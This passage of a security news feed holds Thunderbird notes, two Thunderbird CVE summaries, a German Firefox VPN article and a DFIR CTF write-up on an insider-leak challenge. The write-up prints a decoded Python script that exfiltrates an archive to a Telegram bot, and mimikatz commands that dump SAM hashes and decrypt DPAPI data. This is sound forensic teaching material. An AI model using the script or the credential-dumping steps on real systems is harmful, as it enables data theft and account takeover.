<br>
</p><div>
    <strong>Auf dem Laufenden bleiben?</strong>
    <br>
    <a href="https://www.google.com/preferences/source?q=stadt-bremerhaven.de">Fügt uns doch bei Google als bevorzugte Quelle hinzu!</a>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Mobile Progress Report: June 2026]]></title>
<description><![CDATA[The past month was busy; the theme was evolution. We went into this quarter with our own ideas for what we wanted to accomplish. However, our users had better ideas. With the release of Thunderbird’s own mail service, Thundermail, the need for a better account settings import process across our s...]]></description>
<link>https://tsecurity.de/de/3601570/tools/mobile-progress-report-june-2026/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3601570/tools/mobile-progress-report-june-2026/</guid>
<pubDate>Tue, 16 Jun 2026 13:09:27 +0200</pubDate>
<category>💾  Tools</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>The past month was busy; the theme was evolution. We went into this quarter with our own ideas for what we wanted to accomplish. However, our users had better ideas. With the release of Thunderbird’s own mail service, Thundermail, the need for a better account settings import process across our services and apps became vital. […]</p>
<p>The post <a href="https://blog.thunderbird.net/2026/06/mobile-progress-report-june-2026/">Mobile Progress Report: June 2026</a> appeared first on <a href="https://blog.thunderbird.net/">The Thunderbird Blog</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2022-34484 | Mozilla Thunderbird up to 91.10/101 memory corruption (EUVD-2022-37439 / Nessus ID 246881)]]></title>
<description><![CDATA[A vulnerability labeled as critical has been found in Mozilla Thunderbird up to 91.10/101. The affected element is an unknown function. Such manipulation leads to memory corruption.

This vulnerability is documented as CVE-2022-34484. The attack can be executed remotely. There is not any exploit ...]]></description>
<link>https://tsecurity.de/de/3594812/sicherheitsluecken/cve-2022-34484-mozilla-thunderbird-up-to-9110101-memory-corruption-euvd-2022-37439-nessus-id-246881/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3594812/sicherheitsluecken/cve-2022-34484-mozilla-thunderbird-up-to-9110101-memory-corruption-euvd-2022-37439-nessus-id-246881/</guid>
<pubDate>Sat, 13 Jun 2026 03:07:37 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability labeled as <a href="https://vuldb.com/kb/risk">critical</a> has been found in <a href="https://vuldb.com/product/mozilla:thunderbird">Mozilla Thunderbird up to 91.10/101</a>. The affected element is an unknown function. Such manipulation leads to memory corruption.

This vulnerability is documented as <a href="https://vuldb.com/cve/CVE-2022-34484">CVE-2022-34484</a>. The attack can be executed remotely. There is not any exploit available.

The affected component should be upgraded.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2022-34481 | Mozilla Thunderbird up to 91.10/101 ReplaceElementsAt integer overflow (Bug 1497246 / EUVD-2022-37436)]]></title>
<description><![CDATA[A vulnerability was found in Mozilla Thunderbird up to 91.10/101. It has been classified as critical. Affected by this issue is the function nsTArray_Impl::ReplaceElementsAt. Performing a manipulation results in integer overflow.

This vulnerability is identified as CVE-2022-34481. The attack can...]]></description>
<link>https://tsecurity.de/de/3594662/sicherheitsluecken/cve-2022-34481-mozilla-thunderbird-up-to-9110101-replaceelementsat-integer-overflow-bug-1497246-euvd-2022-37436/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3594662/sicherheitsluecken/cve-2022-34481-mozilla-thunderbird-up-to-9110101-replaceelementsat-integer-overflow-bug-1497246-euvd-2022-37436/</guid>
<pubDate>Sat, 13 Jun 2026 00:33:02 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability was found in <a href="https://vuldb.com/product/mozilla:thunderbird">Mozilla Thunderbird up to 91.10/101</a>. It has been classified as <a href="https://vuldb.com/kb/risk">critical</a>. Affected by this issue is the function <code>nsTArray_Impl::ReplaceElementsAt</code>. Performing a manipulation results in integer overflow.

This vulnerability is identified as <a href="https://vuldb.com/cve/CVE-2022-34481">CVE-2022-34481</a>. The attack can be initiated remotely. There is not any exploit available.

Upgrading the affected component is recommended.]]></content:encoded>
</item>
<item>
<title><![CDATA[IEEE Victoris 4.0 — CTF 2025 — Quals DFIR Challenges]]></title>
<description><![CDATA[IEEE Victoris 4.0 — CTF 2025 —Quals DFIR ChallengesHi, I’m glad to share with you my writeup for getting first blood in 2/2 DFIR challenges.First Challenge: “the Frontdoor” FIRST BLOOD🩸in this challenge, we have a linux disk image, we need to investigate it to get the correct answer. reading the ...]]></description>
<link>https://tsecurity.de/de/3592750/hacking/ieee-victoris-40-ctf-2025-quals-dfir-challenges/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3592750/hacking/ieee-victoris-40-ctf-2025-quals-dfir-challenges/</guid>
<pubDate>Fri, 12 Jun 2026 09:33:33 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h3>IEEE Victoris 4.0 — CTF 2025 —Quals DFIR Challenges</h3><p>Hi, I’m glad to share with you my writeup for getting first blood in 2/2 DFIR challenges.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/843/1*r7vTPHgC_0t6kAXxFx3N3w.png"></figure><p>First Challenge: “the Frontdoor” <strong>FIRST BLOOD</strong>🩸</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/495/1*3HO6z-6mliIaDQWTDIdYQA.png"></figure><p>in this challenge, we have a linux disk image, we need to investigate it to get the correct answer. reading the bash history or “.zsh_history” we can view that there’s a lot of file navigations commands, and Git activity in “MyProject” which located in /home/Documents.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/480/1*F4F7ja4jNJLXS8fvZVKJaQ.png"></figure><p>also, while i was digging around all linux files, i found an xml file “recently-used.xml” located in “/home/kali/.local/share/recently-used.xml”. this xml tracks that he opened /home/kali/Documents/MyProject/.git/config file using Mousepad and Thunar “kali linux gui”.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*ohWftXZJyRAjWf0oFxuMaw.png"></figure><p>so, configfile will be first file to check in MyProjectdirectory</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1009/1*UyQzYFMbtxYv-QzRQDDicQ.png"></figure><p>we can see there’s a beautiful base64 encoded that contains our flag:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/855/1*aCdLTbSVud0hl10YXYp-yA.png"></figure><pre>IEEE{192.168.213.68:3421}</pre><p>Second Challenge: “<strong>Lay-off</strong>” <strong>FIRST BLOOD</strong>🩸</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/450/1*TTZ1qGQeR4PTvxxgYHpGxA.png"></figure><p>this one was so challenging, we got 14 questions that needs to be answered correctly to get our very precious flag</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*kHHnZbOj_KAfLcWu4z6BiA.png"></figure><pre>=== Question Menu ===<br>Unanswered:<br>  1) What is the full name of the employee who sent the email?<br>  2) When was QR Tag company founded? (format: year)<br>  3) What website did the developer log into at 2025-09-18 17:56:51?<br>  4) what was the first thing the developer looked for after receiving the email?<br>  5) The developer created a compressed archive to leak confidential information about QR Tag company. What was it's name?<br>  6) Can you determine the number of files have been leaked?<br>  7) When did this archive get deleted?<br>  8) The developer contacted some buyers on telegram dark markets to sell some of QR Tag's confidential information. What utility did he use to send the data?<br>  9) What is the bot token and chat id used in the script? (format: bot_token:chat_id)<br>  10) Which telegram API did the developer use to send the archive to the bot?<br>  11) What is the username and password of the database used in QR Tag website? (format: username:password)<br>  12) What version of express did the developer use?<br>  13) What service will the QR Tag partnership provide?<br>  14) The developer used a security feature to securely encrypt a secret file. Can you determine what he was trying to hide?</pre><p>we have a windows disk image, and an email :</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/374/1*JVkqWJkKf_TmjOvMphJKAA.png"></figure><pre>1) What is the full name of the employee who sent the email?</pre><p>open the email with thunderbird, you'll find the correct answer easily:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*iJSzHFWHv0nobrFxeZE8ag.png"></figure><pre>1) What is the full name of the employee who sent the email? --&gt; Huda Ahmed</pre><pre>2) When was QR Tag company founded? (format: year)</pre><p>with an online research on linkedin, we'll find in image with same name located in Egypt, Ismailia.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*Bh6y9oU10XLNDQlznyb9xQ.png"><figcaption><strong>challenge author follows this page</strong></figcaption></figure><figure><img alt="" src="https://cdn-images-1.medium.com/max/186/1*KC82e8NCoIrYFGklYoZ-6g.png"></figure><pre>2) When was QR Tag company founded? (format: year) --&gt; 2024</pre><pre>3) What website did the developer log into at 2025-09-18 17:56:51?</pre><p>“<strong>log into</strong>” , by checking the Microsoft edge History database, which located in: C:\Users\&lt;username&gt;\AppData\Local\Microsoft\Edge\User Data\&lt;Profile&gt;\History</p><p>in urls table, sort them by time and go to the following website to decode the time:</p><p><a href="https://www.epochconverter.com/webkit">WebKit/Chrome Timestamp Converter</a></p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*CKNUs9pqA2WuXvtYIal1sQ.png"></figure><figure><img alt="" src="https://cdn-images-1.medium.com/max/698/1*MbwVthWRGbeoiIkgWsUwUA.png"><figcaption><strong>time is perfectly correct</strong></figcaption></figure><pre>3) What website did the developer log into at 2025-09-18 17:56:51?<br>   Answer: www.qrtagapp.com</pre><pre>4) what was the first thing the developer looked for after receiving the email?</pre><p>using thunderbird, open the email with message source, or open the email with any text editor:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/579/1*E4Gsez-x9XrpnbP_zrk-NA.png"></figure><p>so, the correct time must be “<strong>2025–09–19 00:08:59</strong>” in GMT +3</p><p>now let’s find anything intresting, but in the history database of firefox, located in: C:\Users\&lt;username&gt;\AppData\Roaming\Mozilla\Firefox\Profiles\&lt;profile folder&gt;\places.sqlite</p><p>you'll find that, the most recent search after the email was send was all these searches in “<strong><em>moz_places</em></strong>” table:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*357pilL9LM4ujk4fa3LMbw.png"></figure><pre>4) what was the first thing the developer looked for after receiving the email?<br>   <br>   Answer: telegram leaks channels</pre><pre>5) The developer created a compressed archive to leak confidential information about QR Tag company. What was it's name?</pre><p>this was a little dizzy, but what i did was parsing the prefetch files with PECMD <a href="https://ericzimmerman.github.io/#!index.md"><strong>here</strong></a>, and see if there any zip, rar, 7z, gz and so on.</p><p>And yes, i found the prefetch data for using 7z.exe:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/834/1*ja5aSOG_bDC_wKy2dJj36A.png"></figure><p>now let’s check for all files referenced, we can see a 7z file located on MHANY’s desktop:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/876/1*RrvUM43PjOtLcotdMysp1w.png"></figure><pre>5) The developer created a compressed archive to leak confidential information about QR Tag company. What was it's name?<br>   CONFIDENTIAL.7Z</pre><pre>6) Can you determine the number of files have been leaked?</pre><p>that’s so simple, in the prefetch we did parse we can view all files that was compressed and have been leaked:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*Ta5ol6w7Sdnpq_GOStubZg.png"></figure><p>just count all files below CONFIDENTIAL.7Z file:</p><pre>6) Can you determine the number of files have been leaked? --&gt; 11</pre><pre>7) When did this archive get deleted?</pre><p>parsing the $J file with MFTECMD <a href="https://ericzimmerman.github.io/#!index.md"><strong>here</strong></a>, which located inC:\$Extend\$J<br>to see all File creation, deletion, renaming timestamps.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*rNw6Ri4X0W-n-ReIizk3Og.png"></figure><p>we got the deleted timestamp correctly, 9/19/2025 8:05:17 AM GMT 0.</p><p>convert it to the correct format for the flag answer, and add 3 hours to become GMT +3 as the Local Egyptian Time, then subtract 1 sec.</p><pre>7) When did this archive get deleted?<br>   Answer: 2025-09-19 11:05:16</pre><pre>8) The developer contacted some buyers on telegram dark markets to sell some of QR Tag's confidential information. What utility did he use to send the data?</pre><p>this question needs deep investigation, and a good eyesight to catch malicious scripts. found a python file in temp called botscript.py full path: C:\Users\mhany\AppData\Local\temp\botscript.py that contains a too long base64 encoded string:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*e9zheBLyZA4DxXRjyr_TkA.png"></figure><p>it’s not just encoded, it’s reversed. And that’s because of this:</p><pre>b64decode(__[::-1]);</pre><p>so let's reverse it first, and decode the base64 <a href="https://gchq.github.io/CyberChef/#recipe=Reverse('Character')From_Base64('A-Za-z0-9%2B/%3D',true,false)&amp;input=cFFIZWxSbkxsTm5idkIzY2xKSElzSWlPeTltY3lWa0lvUW5icEpIY2dBQ0lnb1FENlUyY3NWbUNOa2lJNXhHYjFaMmN6VjJZalYzY2dRbmJsTkhJbHhXYUdKQ0swNVdheUJISWdBQ0lLMGdPd0FqTWcwVFBnVUdadk4yWHpWSGRoUjNjdVUyY3U5R2N6Vm1jZ1lXYUswZ0NOa1NmbUJpT2lRbmJsMVdkajlHWmlzWFB6VkdicFpHSXMwWE14d1dTSkZEYnNsVU1nb2pJa2wyWDBGR2FqSnllOUVHZGhSR0lzd21jMWhDZHo5R2N1TUhkelZXZHhWbWNnMERJbE5uYnZCM2NsSkhJZ0FDSUswZ09tQnljaEJTS2lJbWNpQUNMSmxVTXN4V01KbFVNc2hpYmxCM2JnZ0dkcGRuQ05vUURpUW5ibDFXZGo5R1JrNVdaejlTZnh3V1NKeEdieEVUU3NGVFM3UjNiaTl5Wnk5bUx0Rm1jblZHYmxSbkxwQlhZdjhpT3pCSGQwaG1JbUJTUGd3bWMxcFFEbm8zTnV3V1lwUm5ibFJXYW01MmJEeEZjdlIzYXpWR1JjbG5iaGhXYmNObmNsTlhWY3B6UW5JSEk5QVNTSkZEYnNGVFNKRkRiSzBnSTVFVE55QUROeEl6TTFJQ0k5QVNNeHdXU0pGRGJzbFVNSzBnSTNSWFpySmtSZlptVWlCMVNpdDJWMzVHY2xwMFFFdEVjbEoxVG9OR2Q0SlhSQkZrT3dFRE0zSXpNMUlqTTRJQ0k5QVNNc2xVU3N4V014a0VieGtrQ05vUUR6UjNjbFZYY2xKSEkwSjNidzFXYQ&amp;oeol=CRLF"><strong>here</strong></a></p><pre>import requests<br><br>I1lI11llIIl1 = "8225327010:AAErxtchORepKDCJepnwWkbKPbRf_FBketw"<br>1Ill1IIl11 = "5321402519"<br>l1II1ll1II = r'C:\Users\mhany\Desktop\Confidential.7z'<br>url = f"https://api.telegram.org/bot{I1lI11llIIl1}/sendDocument"<br><br>with open(l1II1ll1II, "rb") as f:<br>    response = requests.post(url, data={"chat_id": 1Ill1IIl11}, files={"document": f})<br><br>if response.status_code == 200:<br>    print("File sent successfully")<br>else:<br>    print("Error:", response.text)</pre><p>so, he sends the data over telegram bot using a python script</p><pre>8) The developer contacted some buyers on telegram dark markets to sell some of QR Tag's confidential information. What utility did he use to send the data?<br>   Answer: python</pre><pre>9) What is the bot token and chat id used in the script? (format: bot_token:chat_id)<br>10) Which telegram API did the developer use to send the archive to the bot?</pre><p>from the decoded base64 text we can answer these 2 questions easily</p><pre>import requests<br><br>I1lI11llIIl1 = "8225327010:AAErxtchORepKDCJepnwWkbKPbRf_FBketw"<br>1Ill1IIl11 = "5321402519"<br>l1II1ll1II = r'C:\Users\mhany\Desktop\Confidential.7z'<br>url = f"https://api.telegram.org/bot{I1lI11llIIl1}/sendDocument"<br><br>with open(l1II1ll1II, "rb") as f:<br>    response = requests.post(url, data={"chat_id": 1Ill1IIl11}, files={"document": f})<br><br>if response.status_code == 200:<br>    print("File sent successfully")<br>else:<br>    print("Error:", response.text)</pre><p>simple python script. Read, Understand, Answer.</p><pre>9) What is the bot token and chat id used in the script? (format: bot_token:chat_id)<br>Answer: 8225327010:AAErxtchORepKDCJepnwWkbKPbRf_FBketw:5321402519<br><br>10) Which telegram API did the developer use to send the archive to the bot?<br>Answer: /sendDocument</pre><pre>11) What is the username and password of the database used in QR Tag website? (format: username:password)</pre><p>since he is asking for the username, and password for the QR Tag website.</p><p>we can see there’s QRTag Portaldirectory on mhany’s desktop, that contains 2 other subdirectories (Backend &amp;Frontend). checking the Backend directory, we can find .envfile with absolute path: C:\Users\mhany\Desktop\Work\QR Tag\QRTag Portal\Backend\.env</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/597/1*VOfYl_GaLcGcO_LEqprNXg.png"></figure><pre>11) What is the username and password of the database used in QR Tag website? (format: username:password)<br>Answer: H4ny:P@ssw0rd!</pre><pre>12) What version of express did the developer use?</pre><p>In the same Backend directoryC:\Users\mhany\Desktop\Work\QR Tag\QRTag Portal\Backend we'll find package.json file that holds the correct answer</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/601/1*03OyPQ3xqNlhS6BK7U5UZA.png"></figure><pre>12) What version of express did the developer use?<br>Answer: 4.19.2</pre><pre>13) What service will the QR Tag partnership provide?</pre><p>checking the Docs directory which located in: C:\Users\mhany\Desktop\Work\QR Tag\Docs\ we can see there’s a pdf file calledpartnership_agreement.pdf “<strong>partnership</strong>”</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/605/1*jQqQBzau5WjDvClCpWZomQ.png"></figure><pre>13) What service will the QR Tag partnership provide?<br>Answer: identity verification and fraud prevention</pre><pre>14) The developer used a security feature to securely encrypt a secret file. Can you determine what he was trying to hide?</pre><p>Now, for the last juicy part.</p><p>in question 13, we could answer it with PDF file located in C:\Users\mhany\Desktop\Work\QR Tag\Docs\ directory.</p><p>So, while i was checking all other documents files, i found a file called <strong>finance.xlsx </strong>with a very strange magic bytes:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/600/1*_QngmJL0MUNTrhdsO8sVcw.png"><figcaption><strong>finance.xlsx</strong></figcaption></figure><p>of course, it’s not the traditional hex values for an excel file. to be more clearer, there’s an another excel file called <strong>user_accounts.xlsx</strong></p><figure><img alt="" src="https://cdn-images-1.medium.com/max/599/1*adUoqSwT8MTYHsfisagBFA.png"><figcaption><strong>user_accounts.xlsx</strong></figcaption></figure><p>See the difference!!!! <strong>finance.xlsx </strong>is definitely not an excel sheet file.</p><p>So, the question now, what it is actually ?</p><p>and the question says “<em>The developer used a security feature to securely encrypt a secret file</em>”.</p><p>so this file is encrypted with a windows security feature i guess!!</p><p>if we did a quick research on the magic bytes on google <strong>01 00 00 00 D0 8C</strong>, we can definitely get to the point.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/683/1*w8gjA9AesdtPRXeFAO-oaQ.png"><figcaption><strong>DPAPI</strong></figcaption></figure><p>also i did a very weird research, i uploaded the excel file on VirusTotal <a href="https://www.virustotal.com/gui/file/bfeddbd77a68f15e5489b851235c0c00e822f54446bf716309d35b6b44e30a33/details"><strong>link </strong></a>(first one to upload this file) and by reading Details section, we can definitely make sure that this file contains DPAPI encrypted data (100%)</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/798/1*FEHuTsyLcDXhvTlUPkK_Zw.png"></figure><ol><li>we need to recover the DPAPI masterky to decrypt the file data.</li></ol><p>2. and to do recover the DPAPI masterkey, we need to decrypt the masterkey file. location: C\Users\&lt;username&gt;\AppData\Roaming\Microsoft\Protect\&lt;SID&gt;\&lt;GUID&gt;</p><p>3. and to decrypt the masterkey file, we need to recover the logon password for the user “mhany”</p><p>4. and to recover the logon password for this user, we need to decrypt <strong>SAM </strong>registry hive that contains the local account password hashes.</p><p>5. and to decrypt the <strong>SAM</strong> registry hive, we will need also the<strong>SYSTEM</strong>hive<br>which both are located in : C\Windows\System32\config\ directory</p><p>now we know what to do, let’s dig in using mimikatz “<a href="https://github.com/ParrotSec/mimikatz"><strong>link</strong></a>”. running mimikatx .exe file with administrative powershell, then use these commands</p><pre>privilege::debug  #Enables mimikatz to read protected data.<br><br>lsadump::sam /system:&lt;SYSTEM Hive path&gt;/sam:&lt;SAM Hive path&gt;  </pre><p>reading the output, remember we are looking for NTLM hash for mhanyuser only</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/372/1*JfJNV72Qx6C0W85kkth7gA.png"></figure><p>using rainbow-table attack with <a href="https://crackstation.net/"><strong>crackstation</strong></a><strong> </strong>we can get the actual password for this hash</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*875TmuY5AXqNZCopsBFpOQ.png"><figcaption><strong>credentials</strong></figcaption></figure><p>now we get the logon password, let’s recover the master key by decrypting the masterkey file. with mimikatz again, we can use these commands</p><pre>sekurlsa::lgonpasswords   # Because we already have the logon password<br><br>dpapi::masterkey /in:"path to: C\Users\mhany\AppData\Roaming\Microsoft\Protect\&lt;SID&gt;\&lt;GUID&gt;" /password:"credentials"</pre><p>now we can get the decrypted master key in hex.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*fXyi9YeGe-Ncpq76Mz4sVw.png"></figure><p>final step, is to finally decrypt the encrypted finance.xlsx<strong> </strong>file with the key</p><pre>dpapi::blob /in:"path to C:\Users\mhany\Desktop\Work\QR Tag\Docs\finance.xlsx" /masterkey:"d96486156b7651c31945791790941b62f180d198c06966e7e9568d594375c760cf528e6bf55a3bd6dc1bec079b38cbb569a222444ffce861b71a61330ddd1"</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/820/1*qhpnzdCAvttlY2pf8U0OMA.png"><figcaption><strong>FINALLY</strong></figcaption></figure><p>lets decode this encoded base64 data with cyberchef “<a href="https://gchq.github.io/CyberChef/#recipe=From_Base64('A-Za-z0-9%2B/%3D',true,false)&amp;input=ZFhNeGJtZGZiVFJ6ZEROeVgyc3plVjkwTUY5a00yTnllWEIwWDBSUVFWQkpYMlZ1WTNKNWNIUXpaRjl6TTJOeU0zUno"><strong>link</strong></a>”</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/707/1*eCpSy434mV-LpDgh57IOVg.png"><figcaption>OMG!</figcaption></figure><pre>14) The developer used a security feature to securely encrypt a secret file. Can you determine what he was trying to hide?<br>Answer: us1ng_m4st3r_k3y_t0_d3crypt_DPAPI_encrypt3d_s3cr3ts</pre><p>now we can submit all answers and get the flag</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*lGNgwO5Dahi9uwAaHJqp4g.png"></figure><pre>IEEE{Ins1d3r_Thr34t_0r_Just_A_Mad_Dev3l0per}</pre><h4>Thanks For Reading, Hope you enjoyed❤️</h4><p>Keep in touch with me via:</p><p><a href="https://www.linkedin.com/in/loay-salah"><strong>LinkedIn</strong></a></p><p><strong>Discord</strong>: prankster99</p><img src="https://medium.com/_/stat?event=post.clientViewed&amp;referrerSource=full_rss&amp;postId=3b49a1afe7f6" width="1" height="1" alt=""><hr><p><a href="https://infosecwriteups.com/ieee-mansb-ctf-2025-dfir-writeup-3b49a1afe7f6">IEEE Victoris 4.0 — CTF 2025 — Quals DFIR Challenges</a> was originally published in <a href="https://infosecwriteups.com/">InfoSec Write-ups</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Firefox: Gratis-VPN ohne Limits und ein Widget zur Fußball-WM]]></title>
<description><![CDATA[Das mit Firefox 149 eingeführte und in den Browser integrierte Gratis-VPN bietet ab sofort die Wahl zwischen mehr virtuellen Standorten als den bisherigen fünf. Das nutzbare Datenvolumen ist nun unbegrenzt statt auf 50 GB pro Monat beschränkt (Tipp: Hier stellen wir die besten VPN-Anbieter vor). ...]]></description>
<link>https://tsecurity.de/de/3592630/it-nachrichten/firefox-gratis-vpn-ohne-limits-und-ein-widget-zur-fussball-wm/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3592630/it-nachrichten/firefox-gratis-vpn-ohne-limits-und-ein-widget-zur-fussball-wm/</guid>
<pubDate>Fri, 12 Jun 2026 08:32:26 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Das mit Firefox 149 eingeführte und in den Browser integrierte Gratis-VPN bietet ab sofort die Wahl zwischen mehr virtuellen Standorten als den bisherigen fünf. Das nutzbare Datenvolumen ist nun <strong>unbegrenzt</strong> statt auf 50 GB pro Monat beschränkt (<a href="https://www.pcwelt.de/article/1193534/die-besten-vpn-dienste-im-vergleich.html" target="_blank" rel="noreferrer noopener">Tipp: Hier stellen wir die besten VPN-Anbieter vor</a>). Das gilt allerdings nur für diesen Sommer. Außerdem bietet Firefox Widgets und zur <a href="https://www.pcwelt.de/article/3160152/fusball-wm-2026-live-sehen-alle-104-spiele-streamen.html" target="_blank" rel="noreferrer noopener">Fußball-WM</a> passende Tapeten für Startseite. Das gibt es alles, ohne dass Sie ein Update installieren müssen.</p>



<p>Das kostenlose VPN ist derzeit für Firefox-Nutzer in den USA, Kanada, Großbritannien, Frankreich und Deutschland verfügbar. Und nur ebendiese fünf Länder standen bislang (<a href="https://www.pcwelt.de/article/3120715/firefox-150-verbessert-pdf-editor-und-beseitigt-etliche-schwachstellen.html" target="_blank" rel="noreferrer noopener">seit Firefox 150</a>) als VPN-Standorte zur Auswahl. Jetzt erweitert Mozilla die Auswahl vorübergehend auf 28 Länder. Das ist nahe an der Standortauswahl des kostenpflichtigen Mozilla-VPN, das mehr als 30 Länder bietet. Es basiert auf <a href="https://www.pcwelt.de/article/2305468/mullvad-vpn-test-2.html" data-type="link" data-id="https://www.pcwelt.de/article/2305468/mullvad-vpn-test-2.html" target="_blank" rel="noreferrer noopener" title="Testbericht">Mullvad-VPN</a> aus Schweden, das aktuell 50 Länder umfasst. Zu den Ländern im Gratis-VPN gehören zusätzlich Australien, Belgien, Bulgarien, Chile, Dänemark, Finnland, Irland, Italien, Kolumbien, Malaysia, Mexiko, Neuseeland, die Niederlande, Norwegen, Österreich, Polen, Portugal, Schweden, die Schweiz, Singapur, Spanien, Südafrika und Thailand.</p>



<p><a href="https://www.pcwelt.de/article/1197811/die-neuesten-sicherheits-updates.html" target="_blank" rel="noreferrer noopener">▶Die neuesten Sicherheits-Updates</a></p>



<p>Wie <a href="https://blog.mozilla.org/en/firefox/firefox-built-in-vpn-summer/" target="_blank" rel="noreferrer noopener">Mozilla verlautbart</a>, stehen die erweiterte Länderauswahl und das unbegrenzte Datenvolumen ab sofort den Sommer über zur Verfügung – und das heißt in diesem Fall: bis zum 31. August. Ab 1. September gelten wieder die bisherigen Einschränkungen. Sie können das Gratis-VPN nur innerhalb von Firefox verwenden. Bei Mozilla-VPN gilt der Schutz hingegen für alle Programme. Das Gratis-VPN können Sie mit einem kostenlosen Mozilla-Konto nutzen, fürs Mozilla-VPN müssen Sie ein kostenpflichtiges Abo abschließen. Darauf soll diese Sommeraktion wohl Appetit machen.</p>


<div class="extendedBlock-wrapper block-coreImage center"><figure data-wp-context='{"imageId":"6a2ba7c40666b"}' data-wp-interactive="core/image" class="wp-block-image aligncenter size-full is-resized wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/06/ffx-vpn-prob1.webp" alt="Gratis-VPN in Firefox ausprobieren" class="wp-image-3163837" width="1024" height="576" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button><figcaption class="wp-element-caption"><em>Noch als Beta-Version ausgewiesen: das kostenlose Firefox-VPN</em></figcaption></figure><p class="imageCredit">fz</p></div>



<p>Die Sache hat für viele Nutzer noch einen weiteren Haken: Das Gratis-VPN gehört zu den Firefox-Funktionen, die schrittweise aktiviert werden, steht also nicht allen Nutzern sofort zur Verfügung. Auch zwei Monate nach der Einführung gilt es noch immer als Beta-Version und es ist noch nicht bei allen potenziellen Nutzern angekommen. Es ist allerdings denkbar, dass Mozilla im Zuge dieser Sommeraktion auch die Nutzerbasis schneller verbreitert.</p>



<div class="wp-block-idg-base-theme-box-text inline-box">
<p><strong>Ein Tipp von mir:</strong> Wenn Sie das VPN noch nicht angeboten bekommen, kann es auch daran liegen, dass Sie die Firefox-Einstellungen auf maximalen Schutz Ihrer Privatsphäre – auch gegenüber Mozilla – getrimmt haben. An sich gut so. Aber auf zwei meiner PCs (Windows 10 + 11) hat <strong>eine</strong> Änderung <strong>sofort </strong>bewirkt, dass das VPN angeboten wird: Unter <em>Einstellungen » Datenschutz &amp; Sicherheit » Datenerhebung durch Firefox und deren Verwendung</em> gibt es eine Checkbox <em>„Firefox erlauben, Funktionen, Leistung und Stabilität zwischen den Updates zu verbessern“</em>. Ist diese nicht aktiviert, setzen Sie dort einen Haken. Schauen Sie dann auf die Symbolleiste (kein Neustart nötig).</p>
</div>



<p></p>



<h2 class="wp-block-heading">Widgets und Hintergrundbilder zur WM</h2>



